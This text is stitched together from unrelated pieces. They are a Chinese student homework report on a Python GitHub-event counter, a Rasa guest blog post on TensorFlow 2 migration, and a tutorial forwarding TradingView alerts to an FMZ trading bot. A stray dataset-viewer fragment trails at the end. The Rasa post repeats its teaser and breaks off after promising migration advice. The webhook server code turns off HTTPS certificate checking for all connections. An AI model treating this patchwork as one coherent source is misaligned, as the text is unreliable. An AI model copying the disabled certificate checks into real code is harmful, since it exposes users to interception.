学号 <031802515>
PSP 表格
PSP2.1 Personal Software Process Stages 预估耗时(分钟) 实际耗时(分钟)
Planning 计划 20 20
Estimate 估计这个任务需要多少时间 10 10
Development 开发 30 20
Analysis 需求分析 (包括学习新技术) 50 30
Design Spec 生成设计文档 10 5
Design Review 设计复审 10 10
Coding Standard 代码规范 (为目前的开发制定合适的规范) 15 15
Design 具体设计 30 30
Coding 具体编码 250 200
Code Review 代码复审 30 30
Test 测试(自我测试,修改代码,提交修改) 240 200
Reporting 报告 60 60
Test Report 测试报告 20 20
Size Measurement 计算工作量 10 10
Postmortem & Process Improvement Plan 事后总结, 并提出过程改进计划 60 90
合计 755 660
解题思路
拿到题目后,我先下载了数据,发现看不懂。又去看了需要统计的内容,发现真的不知道题目要干什么的。于是万般不好意思下去问了大佬,大佬说让我先去学习 json 这个数据格式。于是我在 b 站上听了几节讲 json 的课,发现它就是一个记录数据的格式,用 python 写得话处理它比较方便,就打算用 python 来写。
我终于弄懂了题目的意思,就是在 GH Archive 的 json 文档中统计同一条信息中个人的 4 种事件的数量,每一个项目的 4 种事件的数量或者每一个人在每一个项目的 4 种事件的数量。之后我看到作业要求用 git 提交代码到 GitHub 并且学会用 .gitignore 指令忽略一些文件,所以我去 b 站听了助教老师的 git 教程,下载和配置了 git 。
看过老师的代码格式要求后开始打代码,代码的功能大体分为三部分,第一部分是读取文件夹里的 json 文件,第二部分是在 json 文件里查找特定数据,第三部分是对查找目标的计数。
设计实现过程
问题剖析:
首先要获得用户命令行参数,并且利用命令行参数进行数据查找。
实现过程:
获取命令参数时通过 getopt 方法提取参数
进行数据查找与统计,多个 .json 文件读取需要用到 os.walk() 方法遍历文件夹下的文件,并且通过 .append() 与 json.loads() 方法将多个 json 数据存入同一数组。
特定数据的查找方法是通过 .find() 方法进行数据的查找。
查找目标的计数通过多层迭代进行以行为独立元素的累加。
关键函数流程图
关键代码
json解析
def read(path):
global data
data = []
path_all = []
for root, dirs, files in os.walk(path):
for file in files:
path_all.append(os.path.join(root, file))
for i in range(0,len(path_all)):
with open(path_all[i],'r',encoding='utf8')as f:
for line in f:
data.append(json.loads(line))
命令行参数设置
opt,arv= getopt.getopt(sys.argv[1:],'i:u:r:e:',['user=','repo=','event=','init='])
遍历查找参数
def get_cmd():
global path,user,repo,event,judger,length
path,user,repo,event = 'djista','djista','djista','djista'
opt,arv= getopt.getopt(sys.argv[1:],'i:u:r:e:',['user=','repo=','event=','init='])
if len(opt):
length = len(opt)
for i in range(0,len(opt)):
if opt[i][0] == '-i':
path = opt[i][1]
elif opt[i][0] == '-u':
user = opt[i][1]
judger = 1
elif opt[i][0] == '-r':
repo = opt[i][1]
judger = 2
elif opt[i][0] == '-e':
event = opt[i][1]
else:
break
else:
print('Input command error')
统计计算结果
def find_data():
result = 0
#每一行数据分别存储在了对应的data[]列表中
#查找用户
for i in range(0,len(data)):
data_str = str(data[i])
if judger == 1:
if data_str.find(user) != -1:
if data_str.find(event) != -1:
result = result + 1
if judger == 2:
if length == 3:
if data_str.find(repo) != -1:
if data_str.find(event) != -1:
result = result + 1
else:
if data_str.find(repo) != -1:
if data_str.find(event) != -1:
if data_str.find(user)!= -1:
result = result + 1
print(result)
单元测试截图和解释
解析 24.9 Mb json 文件花费 0.68 s
此参数单元测试覆盖率 79%
解析 998 Mb json 文件花费 14.75 s
此参数单元测试覆盖率 83%
我的程序执行结果
单元测试优化
因为运行速度较慢,所以打算写成多线程来优化代码,但是因为太菜了,写成多线程反而更慢了。
关键多线程代码
if __name__ == '__main__':
sum =[]
start_time = time.time()
get_cmd()
read_1(path)
t1 = threading.Thread(target=ooopen,args=(0,2))
t2 = threading.Thread(target=ooopen,args=(2,4))
t3 = threading.Thread(target=ooopen,args=(4,6))
t4 = threading.Thread(target=ooopen,args=(6,count))
#t3 = threading.Thread(target=find_data)
t1.start()
t2.start()
t3.start()
t4.start()
t4.join()
print(sum[0]+sum[1]+sum[2]+sum[3])
end_time = time.time() # 记录程序结束运行时间
print('Took %f second3' % (end_time - start_time))
我的代码规范连接
作业小结
拿到题目后因为看不懂就以为完全不会做,所以托了很多天,浪费了很多时间。
刚学习 json 的时候不知道怎么下手,就先看了很多 CSDN 和博客园的文章,其实对于完全没有接触过的知识直接去听课会理解的快很多。
刚开始对 Python 不熟悉,很多方法都要去查了之后才知道怎么用,算法方面问了很多大佬。所以还是要再熟悉 Python 才行。
学会了运用 coverage 测试 Python 代码覆盖率。
通过这次作业学会了很多,希望能再进一步提高自己解决问题的能力和代码熟练度。
|
December 16, 2020 — A guest post by Vincent D. Warmerdam and Vladimir Vlasov, Rasa
At Rasa, we are building infrastructure for conversational AI, used by developers to build chat- and voice-based assistants. Rasa Open Source, our cornerstone product offering, provides a framework for NLU (Natural Language Understanding) and dialogue management. On the NLU side we offer models that handle intent classification and en…
A guest post by Vincent D. Warmerdam and Vladimir Vlasov, Rasa
At Rasa, we are building infrastructure for conversational AI, used by developers to build chat- and voice-based assistants. Rasa Open Source, our cornerstone product offering, provides a framework for NLU (Natural Language Understanding) and dialogue management. On the NLU side we offer models that handle intent classification and entity detection using models built with Tensorflow 2.x.
In this article, we would like to discuss the benefits of migrating to the latest version of TensorFlow and also give insight into how some of the Rasa internals work.
When you’re building a virtual assistant with Rasa Open Source, you’ll usually begin by defining stories, which represent conversations users might have with your agent. These stories will serve as training data and you can configure them as yaml files. If we pretend that we’re making an assistant that allows you to buy pizzas online then we might have stories in our configuration that look like this:
yamlversion: "2.0"stories:- story: happy path steps: - intent: greet - action: utter_greet - intent: mood_great - action: utter_happy- story: purchase path steps: - intent: greet - action: utter_greet - intent: purchase entities: product: “pizza” - action: confirm_purchase - intent: affirm - action: confirm_availability
These stories consist of intents and actions. Actions can be simple text replies, or they can trigger custom Python code (that checks a database, for instance). To define training data for each intent, you supply the assistant with example user messages, which might look something like:
yaml
version: "2.0"
nlu:
- intent: greet
examples: |
- hey
- hello
- hi
- hello there
- good morning
- intent: purchase
examples: |
- i’d like to buy a [veggie pizza](product) for [tomorrow](date_ref)
- i want to order a [pizza pepperoni](product)
- i’d want to buy a [pizza](product) and a [cola](product)
- ...
When you train an assistant using Rasa you’ll supply configuration files like those shown above. You can be very expressive in the types of conversations your agent can handle. Intents and actions are like lego bricks and can be combined expressively to cover many conversational paths. Once these files are defined they are combined to create a training dataset that the agent will learn from.
Rasa allows users to build custom machine learning pipelines to fit their datasets. That means you can incorporate your own (pre-trained) models for natural language understanding if you’d like. But Rasa also provides models, written in TensorFlow, that are specialized for these tasks.
You may have noticed that our examples include not just intents but also entities. When a user is interested in making a purchase, they (usually) also say what they’re interested in buying. This information needs to be detected when the user provides it. It’d be a bad experience if we needed to supply the user with a form to retrieve this information.
If you take a step back and think about what kind of model could work well here, you’ll soon recognize that it’s not a standard task. It’s not just that we have numerous labels at each utterance; we have multiple *types* of labels too. That means that we need models that have two outputs.
Rasa Open Source offers a model that can detect both intents and entities, called DIET. It uses a transformer architecture that allows the system to learn from the interaction between intents and entities. Because it needs to handle these two tasks at once, the typical machine learning pattern won’t work:
model.fit(X, y).predict(X)
You need a different abstraction.
Abstraction
This is where TensorFlow 2.x has made an improvement to the Rasa codebase. It is now much easier to customize TensorFlow classes. In particular, we’ve made a custom abstraction on top of Keras to suit our needs. One example of this is Rasa’s own internal `RasaModel.` We’ve added the base class’s signature below. The full implementation can be found here.
class RasaModel(tf.keras.models.Model):
def __init__(
self,
random_seed: Optional[int] = None,
tensorboard_log_dir: Optional[Text] = None,
tensorboard_log_level:Optional[Text] = "epoch",
**kwargs,
) -> None:
...
def fit(
self,
model_data: RasaModelData,
epochs: int,
batch_size: Union[List[int], int],
evaluate_on_num_examples: int,
evaluate_every_num_epochs: int,
batch_strategy: Text,
silent: bool = False,
eager: bool = False,
) -> None:
...
This object is customized to allow us to pass in our own `RasaModelData` object. The benefit is that we can keep all the existing features that the Keras model object offers while we can override a few specific methods to suit our needs. We can run the model with our preferred data format while maintaining manual control over “eager mode,” which helps us debug.
These Keras objects are now a central API in TensorFlow 2.x, which made it very easy for us to integrate and customize.
Training Loop
To give another impression of how the code became simpler, let’s look at the training loop inside the Rasa model.
Python Pseudo-Code for TensorFlow 1.8
We’ve got a part of the code used for our old training loop listed below (see here for the full implementation). Note that it is using `session.run` to calculate the loss as well as the accuracy.
def train_tf_dataset(
train_init_op: "tf.Operation",
eval_init_op: "tf.Operation",
batch_size_in: "tf.Tensor",
loss: "tf.Tensor",
acc: "tf.Tensor",
train_op: "tf.Tensor",
session: "tf.Session",
epochs: int,
batch_size: Union[List[int], int],
evaluate_on_num_examples: int,
evaluate_every_num_epochs: int,
)
session.run(tf.global_variables_initializer())
pbar = tqdm(range(epochs),desc="Epochs", disable=is_logging_disabled())
for ep in pbar:
ep_batch_size=linearly_increasing_batch_size(ep, batch_size, epochs)
session.run(train_init_op, feed_dict={batch_size_in: ep_batch_size})
ep_train_loss = 0
ep_train_acc = 0
batches_per_epoch = 0
while True:
try:
_, batch_train_loss, batch_train_acc = session.run(
[train_op, loss, acc])
batches_per_epoch += 1
ep_train_loss += batch_train_loss
ep_train_acc += batch_train_acc
except tf.errors.OutOfRangeError:
break
The train_tf_dataset function requires a lot of tensors as input. In TensorFlow 1.8, you need to keep track of these tensors because they contain all the operations you intend to run. In practice, this can lead to cumbersome code because it is hard to separate concerns.
Python Pseudo-Code for TensorFlow 2.x
In TensorFlow 2, all of this has been made much easier because of the Keras abstraction. We can inherit from a Keras class that allows us to compartmentalize the code much better. Here is the `train` method from Rasa’s DIET classifier (see here for the full implementation).
def train(
self,
training_data: TrainingData,
config: Optional[RasaNLUModelConfig] = None,
**kwargs: Any,
) -> None:
"""Train the embedding intent classifier on a data set."""
model_data = self.preprocess_train_data(training_data)
self.model = self.model_class()(
config=self.component_config,
)
self.model.fit(
model_data,
self.component_config[EPOCHS],
self.component_config[BATCH_SIZES],
self.component_config[EVAL_NUM_EXAMPLES],
self.component_config[EVAL_NUM_EPOCHS],
self.component_config[BATCH_STRATEGY],
)
The object-oriented style of programming from Keras allows us to customize more. We’re able to implement our own `self.model.fit` in such a way that we don’t need to worry about the `session` anymore. We don’t even need to keep track of the tensors because the Keras API abstracts everything away for you.
It’s not just the Keras models where we apply this abstraction; we’ve also developed some neural network layers using a similar technique.
We’ve implemented a few custom layers ourselves. For example, we’ve got a layer called `DenseWithSparseWeights.` It behaves just like a dense layer, but we drop many weights beforehand to make it more sparse. Again we only need to inherit from the right class (tf.keras.layers.Dense) to create it.
We’ve grown so fond of customizing that we’ve even implemented a loss function as a layer. This made a lot of sense for us, considering that losses can get complex in NLP. Many NLP tasks will require you to sample such that you also have labels of negative examples during training. You may also need to mask tokens during the process. We’re also interested in recording the similarity loss as well as the label accuracy. By just making our own layer, we are building components for re-use, and it is easy to maintain as well.
Lessons Learned
Discovering this opportunity for customization made a massive difference for Rasa. We like to design our algorithms to be flexible and applicable in many circumstances, and we were happy to learn that the underlying technology stack allowed us to do so. We do have some advice for folks who are working on their TensorFlow migration:
December 16, 2020 — A guest post by Vincent D. Warmerdam and Vladimir Vlasov, Rasa
At Rasa, we are building infrastructure for conversational AI, used by developers to build chat- and voice-based assistants. Rasa Open Source, our cornerstone product offering, provides a framework for NLU (Natural Language Understanding) and dialogue management. On the NLU side we offer models that handle intent classification and en…
|
TradingView is a good market quotes drawing tool.
The pine script is also a powerful existence!
Backtesting, alarming, and various docking is a very complete financial tool.
But there are two issues that have been plaguing us…
Today our article is to take you to solve the problem of exchange docking issues.
The overall idea is like this:
TV(TradingView) pine script -> signal alarm webhook -> local webhook server forwarding request -> FMZ bot receives the request to operate
let’s go step by step.
Go to TradingView website:
Next, we first create an Alert, see the figure below for details
Some aspects in the picture need to pay attention to, when generating Alert.
The validity period, webhook address, and message content must be well done.
The expiration date, this one will know at a glance, and it will be invalid when it expires…
Webhook URL, let’s keep it empty first, we will fill it in when the local webhook service is done.
Message here, it is best we have a clear explanation, in order to let the bot distinguish from Alert messages.
I generally set it like this: XXX strategy, order quantity and trading direction
So far, the TradingView part is basically done!
Next, let’s get the local webhook service job done!
This kind of work, Google it will show you lots of results. this article will skip this part, you can do it by yourself.
here is a simple framework for python:
GitHub: https://github.com/shawn-sterling/gitlab-webhook-receiver
Safe, worry-free and convenient, but there are also issues.
This little frame, it will!! Suicide!! Please pay attention to this issue!
So, I wrote another script on the server, When “die” or “offline” appears in the log, I will restart it. later on, i still feel not safe, so i set it restart regularly. Find an unimportant time every hour… Give it a restart, it has been safely running for two months now and there is no more signal losses.
In addition, TradingView only recognizes the port 80, so don’t mess up the service port.
So far, We have done the Message from Alert part. Next, how do we get Bot?
I don’t know if you have paid attention to the interface API document of FMZ at the bottom:
We can pass some commands to our little Bot through API! The specific request example is here, the red box is the request we need.
Here also needs some preparation work. FMZ API (avatar->account settings->API interface), A Bot that has been started (we want to get its ID, so we create a new ID first), the number in the URL of a general robot is the ID.
Next, we transform the webhook service so that after receiving the message, it will be automatically forwarded to the FMZ Bot.
Finally, don’t forget to fill in the completed webhook address in the TradingView Alert(format: http://xx.xx.xx.xx:80)
The following is the service code I changed, you can use it as a reference:
#!/usr/bin/python -tt
# -*- coding: UTF-8 -*-
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
import logging
import logging.handlers
import os
import re
import shutil
import subprocess
import time
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
try:
import md5
import urllib2
from urllib import urlencode
except:
import hashlib as md5
import urllib.request as urllib2
from urllib.parse import urlencode
############################################################
##### You will likely need to change some of the below #####
# log file for this script
log_file = '/root/webhook/VMA/webhook.log'
# Bot api licence
accessKey = ''
secretKey = ''
# HTTP config
log_max_size = 25165824 # 24 MB
log_level = logging.INFO
#log_level = logging.DEBUG # DEBUG is quite verbose
listen_port = 80
##### You should stop changing things unless you know what you are doing #####
##############################################################################
log = logging.getLogger('log')
log.setLevel(log_level)
log_handler = logging.handlers.RotatingFileHandler(log_file,
maxBytes=log_max_size,
backupCount=4)
f = logging.Formatter("%(asctime)s %(filename)s %(levelname)s %(message)s",
"%B %d %H:%M:%S")
log_handler.setFormatter(f)
log.addHandler(log_handler)
class webhookReceiver(BaseHTTPRequestHandler):
def run_it(self, cmd):
"""
runs a command
"""
p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
log.debug('running:%s' % cmd)
p.wait()
if p.returncode != 0:
log.critical("Non zero exit code:%s executing: %s" % (p.returncode,
cmd))
return p.stdout
def bot_conmand(self, method, *args):
"""
send conmand request to bot api
"""
d = {
'version': '1.0',
'access_key': accessKey,
'method': method,
'args': json.dumps(list(args)),
'nonce': int(time.time() * 1000),
}
d['sign'] = md5.md5(('%s|%s|%s|%d|%s' % (d['version'], d['method'], d['args'], d['nonce'], secretKey)).encode('utf-8')).hexdigest()
return json.loads(urllib2.urlopen('https://www.fmz.com/api/v1', urlencode(d).encode('utf-8')).read().decode('utf-8'))
def do_POST(self):
"""
receives post, handles it
"""
log.debug('got post')
message = 'OK'
self.rfile._sock.settimeout(5)
data_string = self.rfile.read(int(self.headers['Content-Length']))
log.info(data_string)
self.send_response(200)
self.send_header("Content-type", "text")
self.send_header("Content-length", str(len(message)))
self.end_headers()
self.wfile.write(message)
log.debug('TV connection should be closed now.')
#log.info(self.bot_conmand('GetRobotList', -1, -1, -1)) # GetRobotList(offset, length, robotStatus int)Pass -1 to get all
log.info(self.bot_conmand('CommandRobot', 169788, data_string)) # CommandRobot(robotId int64, cmd string)Send commands to the robot
def log_message(self, formate, *args):
"""
disable printing to stdout/stderr for every post
"""
return
def main():
"""
the main event.
"""
try:
server = HTTPServer(('', listen_port), webhookReceiver)
log.info('started web server...')
server.serve_forever()
except KeyboardInterrupt:
log.info('ctrl-c pressed, shutting down.')
server.socket.close()
if __name__ == '__main__':
main()
All the above described the communication implementation, our Bot trading strategy also needs to be processed accordingly, in order for us to fix our receiving signal process.
For example, the Alert Message designed at the beginning, You can play it according to your preferences and specific needs.
The code is as follows, get the information, filter them, do the operation, and end.
function get_Command() { //Responsible function for interaction, interactively update relevant values in time, users can expand by themselves
var way = null; //route
var cmd = GetCommand(); // Get interactive command API
var cmd_arr = cmd.split(",");
if (cmd) {
// Define the route
if (cmd.indexOf("BUY,1") != -1) {
way = 1;
}
if (cmd.indexOf("SELL,1") != -1) {
way = 2;
}
if (cmd.indexOf("BUY,2") != -1) {
way = 3;
}
if (cmd.indexOf("SELL,2") != -1) {
way = 4;
}
// Branch selection operation
switch (way) {
case 1:
xxx
break;
case 2:
xxx
break;
case 3:
xxx
break;
case 4:
xxx
break;
default:
break;
}
}
}
This article is over, hope it can help you!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.